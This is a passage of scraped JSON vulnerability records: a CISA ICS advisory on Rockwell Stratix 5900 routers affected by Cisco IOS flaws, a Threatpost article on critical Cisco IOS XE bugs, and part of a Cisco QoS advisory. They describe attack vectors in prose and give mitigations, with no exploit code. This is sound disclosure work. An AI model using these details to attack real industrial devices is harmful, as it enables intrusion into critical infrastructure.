"https://www.oig.dhs.gov/", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/134.html", "https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html", "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167", "https://www.dhs.gov/freedom-information-act-foia", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp", "http://twitter.com/icscert", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov/", "https://cwe.mitre.org/data/definitions/119.html", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151"], "reporter": "Industrial Control Systems Cyber Emergency Response Team", "title": "Rockwell Automation Stratix Services Router", "type": "ics", "viewCount": 7}, "differentElements": ["href"], "edition": 6, "lastseen": "2021-02-24T09:28:33"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION**: Exploitable remotely/low skill level to exploit.\n * **Vendor**: Rockwell Automation\n * **Equipment**: Allen-Bradley Stratix 5900 Services Router\n * **Vulnerabilities**: Improper Input Validation, Improper Restriction of Operations within the Bounds of a Memory Buffer, Use of Externally-Controlled Format String.\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Allen-Bradley Stratix Services Router use a vulnerable version of Cisco IOS or IOS XE:\n\n * Allen-Bradley Stratix 5900 Services Router, version 15.6.3M1 and earlier.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition.\n\nThe vulnerability is due to incorrect processing of certain IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition.\n\n[CVE-2018-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H>)).\n\n### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\n[CVE-2018-0151](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.3 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA buffer overflow vulnerability in the LLDP subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0167](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.4 [USE OF EXTERNALLY-CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nA format string vulnerability in the LLDP subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **Critical Infrastructure Sectors:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **Countries/Areas Deployed: **Worldwide\n * **Company Headquarters Location: **Wisconsin, USA\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported these vulnerabilities to NCCIC from the semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation has released knowledge base article 1073313 which can be found at the following location:\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/> (login required)\n\nCisco has released Snort Rules 46110 and 46111 to help address CVE-2018-0158 and CVE-2018-0151. See new rules at:\n\n<https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html>\n\nCVE-2018-0151: Users who do not use the Adaptive QoS for DMVPN feature can deny all traffic destined to UDP port 18999 on an affected device by using a Control Plane Policing (CoPP) policy. If the Adaptive QoS for DMVPN feature is later configured, the device must be upgraded to an unaffected release of Cisco IOS Software or Cisco IOS XE Software and the CoPP policy must be removed.\n\nCVE-2018-0167 and CVE-2018-0175 have no specific mitigations in place. See the following Cisco Vulnerability advisory for more details:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp>\n\nRockwell Automation also recommends that users implement the following general security guidelines:\n\n * Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03>); we'd welcome your feedback.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-02-27T19:51:41", "references": [{"idList": ["ICSA-18-107-05", "ICSA-18-107-04"], "type": "ics"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["CISCO-SA-20180328-LLDP", "CISCO-SA-20180328-IKE", "CISCO-SA-20180328-QOS"], "type": "cisco"}, {"idList": ["CISCO-SA-20180328-LLDP-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOSXE.NASL", "CISCO-SA-20180328-LLDP-IOS.NASL", "CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-LLDP-IOSXR.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOS.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-27T19:51:41", "rev": 2, "value": 8.1, "vector": "NONE"}}, "hash": "6bacb7d1f53629c70f9ea81633f43f8b87feb3dc091e095fc8b90c678f612eb8", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "669dbcecfbb91195b183fceab6920a7a", "key": "type"}, {"hash": "125c93e4226dd910c362041bedb79b30", "key": "references"}, {"hash": "8cff2908af01aa53a58927e674d1f945", "key": "reporter"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "cf1c6d50ae83a0edccae6c26d1c8b228", "key": "published"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "ba0c2b44652011e247af55cbc7091eee", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "2d4a6d75738e3861e638576ef5151171", "key": "title"}, {"hash": "79026a99a13eec05ca284b85badea84a", "key": "description"}, {"hash": "1ebc96e5065a184c420d4bd937731299", "key": "modified"}, {"hash": "e5f2bcf71b53197b8c59c81e5bb963e5", "key": "href"}], "history": [], "href": "https://www.us-cert.gov/ics/advisories/ICSA-18-107-03", "id": "ICSA-18-107-03", "immutableFields": [], "lastseen": "2021-02-27T19:51:41", "modified": "2018-04-25T00:00:00", "objectVersion": "1.5", "published": "2018-04-17T00:00:00", "references": ["https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.whitehouse.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/20.html", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "https://www.dhs.gov/plain-writing-dhs", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175", "https://www.oig.dhs.gov/", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/134.html", "https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html", "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167", "https://www.dhs.gov/freedom-information-act-foia", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp", "http://twitter.com/icscert", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov/", "https://cwe.mitre.org/data/definitions/119.html", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151"], "reporter": "Industrial Control Systems Cyber Emergency Response Team", "title": "Rockwell Automation Stratix Services Router", "type": "ics", "viewCount": 8}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2021-02-27T19:51:41"}], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-0158", "CVE-2018-0175", "CVE-2018-0167", "CVE-2018-0151"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-IKE", "CISCO-SA-20180328-LLDP", "CISCO-SA-20180328-QOS"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-IKE-IOS.NASL", "CISCO-SA-20180328-LLDP-IOS.NASL", "720296.PRM", "CISCO-SA-20180328-IKE-IOSXE.NASL", "OT_500175.NASL", "CISCO-SA-20180328-LLDP-IOSXE.NASL", "OT_500285.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-LLDP-IOSXR.NASL", "CISCO-SA-20180328-QOS-IOS.NASL"]}, {"type": "ics", "idList": ["ICSA-18-107-05", "ICSA-18-107-04"]}, {"type": "threatpost", "idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889900"]}], "modified": "2021-02-27T19:51:41", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-02-27T19:51:41", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.ics.ICSBulletin", "_object_types": ["robots.models.ics.ICSBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "ba0c2b44652011e247af55cbc7091eee"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "cvss2", "hash": "729f98bc4a65b3e0e24ddfee3d3c4450"}, {"key": "cvss3", "hash": "ad35358d166de03a84a3a9280d95337a"}, {"key": "description", "hash": "79026a99a13eec05ca284b85badea84a"}, {"key": "href", "hash": "e5f2bcf71b53197b8c59c81e5bb963e5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "1ebc96e5065a184c420d4bd937731299"}, {"key": "published", "hash": "cf1c6d50ae83a0edccae6c26d1c8b228"}, {"key": "references", "hash": "125c93e4226dd910c362041bedb79b30"}, {"key": "reporter", "hash": "8cff2908af01aa53a58927e674d1f945"}, {"key": "title", "hash": "2d4a6d75738e3861e638576ef5151171"}, {"key": "type", "hash": "669dbcecfbb91195b183fceab6920a7a"}], "scheme": null}], "threatpost": [{"id": "THREATPOST:B7DF4F28933004E3E4D52762786306C4", "hash": "4ea03c2f6546c7a4ba9cc44ea41d1b2a", "type": "threatpost", "bulletinFamily": "info", "title": "Cisco Patches Two Critical RCE Bugs in IOS XE Software", "description": "Three critical vulnerabilities were patched by Cisco Systems on Wednesday, each tied to the company\u2019s widely used internetworking operating system IOS XE. Two of the bugs are remote code execution vulnerabilities that could allow an attacker to take control over affected systems.\n\nThe critical bug disclosures were three of 22 vulnerabilities disclosed by Cisco on Wednesday, part of the company\u2019s semiannual IOS and IOS XE [software security advisory bundled publication](<https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682>). While three maintained a security impact rating of critical, 19 had a rating of high.\n\nThe first of the critical flaws ([CVE-2018-0151](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos>)) identified by Cisco is an \u201cIOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability.\u201d\n\n\u201cA vulnerability in the quality of service subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service condition or execute arbitrary code with elevated privileges,\u201d the company wrote in its Cisco Security Advisory.\n\nCisco said the bug is tied to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. Bounds checking [is defined as](<https://en.wikipedia.org/wiki/Bounds_checking>) \u201cany method of detecting whether a variable is within some bounds before it is used.\u201d\n\n\u201cAn attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur,\u201d Cisco said.\n\nCisco has released software updates and workarounds that mitigate against the vulnerability.\n\nThe second \u201cCisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability\u201d ([CVE-2018-0171](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2>)) is a flaw in the Smart Install feature of Cisco IOS Software and Cisco IOS XE software.\n\n\u201cThe vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786,\u201d according to the Cisco advisory.\n\nA successful attack could allow an adversary to perform a buffer overflow attack on a targeted device allowing remote code execution or causing an indefinite loop that would trigger a \u201cwatchdog crash.\u201d\n\nA software fix is available, but no workaround exists, the company said.\n\nLastly, Cisco said vulnerable versions of its Cisco IOS XE Software \u201ccould allow an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default username and password that are used at initial boot.\u201d\n\nThis vulnerability ([CVE-2018-0150](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc>)) is due to an undocumented user account \u201cwith privilege level 15\u201d hat has a default username and password. \u201cAn attacker could exploit this vulnerability by using this account to remotely connect to an affected device. A successful exploit could allow the attacker to log in to the device with privilege level 15 access,\u201d Cisco wrote.\n\nCisco IOS offers 16 privilege levels for access to different system commands. For example, \u201cUser EXEC mode\u201d is privilege level 1 and \u201cPrivileged EXEC mode\u201d is level 15, which is equivalent to having root privileges.\n\n\u201cThis vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS XE Software Release 16.x. This vulnerability does not affect Cisco IOS XE Software releases prior to Release 16.x,\u201d Cisco wrote.\n\nCisco said that both a workaround and a patch is available to address CVE-2018-0150.\n\n\u201cTo address this vulnerability, administrators may remove the default account by using the_ \u2018_no username cisco\u2019 command in the device configuration. Administrators may also address this vulnerability by logging in to the device and changing the password for this account,\u201d Cisco said.\n", "published": "2018-03-28T17:35:07", "modified": "2018-03-28T17:35:07", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://threatpost.com/cisco-patches-two-critical-rce-bugs-in-ios-xe-software/130852/", "reporter": "Tom Spring", "references": ["https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "https://en.wikipedia.org/wiki/Bounds_checking", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc"], "cvelist": ["CVE-2018-0150", "CVE-2018-0151", "CVE-2018-0171"], "lastseen": "2019-01-23T05:27:27", "history": [{"bulletin": {"id": "THREATPOST:B7DF4F28933004E3E4D52762786306C4", "hash": "c944f096aad248010e61ec940eadf6da", "type": "threatpost", "bulletinFamily": "info", "title": "Cisco Patches Two Critical RCE Bugs in IOS XE Software", "description": "Three critical vulnerabilities were patched by Cisco Systems on Wednesday, each tied to the company\u2019s widely used internetworking operating system IOS XE. Two of the bugs are remote code execution vulnerabilities that could allow an attacker to take control over affected systems.\n\nThe critical bug disclosures were three of 22 vulnerabilities disclosed by Cisco on Wednesday, part of the company\u2019s semiannual IOS and IOS XE [software security advisory bundled publication](<https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682>). While three maintained a security impact rating of critical, 19 had a rating of high.\n\nThe first of the critical flaws ([CVE-2018-0151](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos>)) identified by Cisco is an \u201cIOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability.\u201d\n\n\u201cA vulnerability in the quality of service subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service condition or execute arbitrary code with elevated privileges,\u201d the company wrote in its Cisco Security Advisory.\n\nCisco said the bug is tied to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. Bounds checking [is defined as](<https://en.wikipedia.org/wiki/Bounds_checking>) \u201cany method of detecting whether a variable is within some bounds before it is used.\u201d\n\n\u201cAn attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur,\u201d Cisco said.\n\nCisco has released software updates and workarounds that mitigate against the vulnerability.\n\nThe second \u201cCisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability\u201d ([CVE-2018-0171](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2>)) is a flaw in the Smart Install feature of Cisco IOS Software and Cisco IOS XE software.\n\n\u201cThe vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786,\u201d according to the Cisco advisory.\n\nA successful attack could allow an adversary to perform a buffer overflow attack on a targeted device allowing remote code execution or causing an indefinite loop that would trigger a \u201cwatchdog crash.\u201d\n\nA software fix is available, but no workaround exists, the company said.\n\nLastly, Cisco said vulnerable versions of its Cisco IOS XE Software \u201ccould allow an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default username and password that are used at initial boot.\u201d\n\nThis vulnerability ([CVE-2018-0150](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc>)) is due to an undocumented user account \u201cwith privilege level 15\u201d hat has a default username and password. \u201cAn attacker could exploit this vulnerability by using this account to remotely connect to an affected device. A successful exploit could allow the attacker to log in to the device with privilege level 15 access,\u201d Cisco wrote.\n\nCisco IOS offers 16 privilege levels for access to different system commands. For example, \u201cUser EXEC mode\u201d is privilege level 1 and \u201cPrivileged EXEC mode\u201d is level 15, which is equivalent to having root privileges.\n\n\u201cThis vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS XE Software Release 16.x. This vulnerability does not affect Cisco IOS XE Software releases prior to Release 16.x,\u201d Cisco wrote.\n\nCisco said that both a workaround and a patch is available to address CVE-2018-0150.\n\n\u201cTo address this vulnerability, administrators may remove the default account by using the_ \u2018_no username cisco\u2019 command in the device configuration. Administrators may also address this vulnerability by logging in to the device and changing the password for this account,\u201d Cisco said.\n", "published": "2018-03-28T17:35:07", "modified": "2018-04-04T16:25:59", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://threatpost.com/cisco-patches-two-critical-rce-bugs-in-ios-xe-software/130852/", "reporter": "Tom Spring", "references": ["https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "https://en.wikipedia.org/wiki/Bounds_checking", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc"], "cvelist": ["CVE-2018-0150", "CVE-2018-0151", "CVE-2018-0171"], "lastseen": "2018-10-06T22:52:35", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 10.0, "vector": "NONE", "modified": "2018-10-06T22:52:35"}}, "objectVersion": "1.4"}, "lastseen": "2018-10-06T22:52:35", "differentElements": ["modified"], "edition": 1}], "viewCount": 22, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2019-01-23T05:27:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-0171", "CVE-2018-0150", "CVE-2018-0151"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889900"]}, {"type": "seebug", "idList": ["SSV:97206"]}, {"type": "exploitdb", "idList": ["EDB-ID:44451"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-XESC", "CISCO-SA-20180328-SMI2", "CISCO-SA-20180328-QOS"]}, {"type": "thn", "idList": ["THN:3347044068F87AF8B4B5B834EC20FE3F", "THN:281560A81151A934501A27157417DD37"]}, {"type": "nessus", "idList": ["CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-SMI2-IOSXE.NASL", "CISCO-SA-20180328-XESC.NASL", "720296.PRM", "CISCO-SA-20180328-SMI2-IOS.NASL", "CISCO-SA-20180328-QOS-IOS.NASL"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "ics", "idList": ["ICSA-18-107-04", "ICSA-18-107-03", "ICSA-18-107-05"]}, {"type": "threatpost", "idList": ["THREATPOST:5626B60300A229EE9E8C4BCC5D24A5BA"]}], "modified": "2019-01-23T05:27:27", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.threatpost.ThreatpostBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "cisco": [{"id": "CISCO-SA-20180328-QOS", "hash": "0d7a328c3dcbe2338df2d67c850fed35", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": 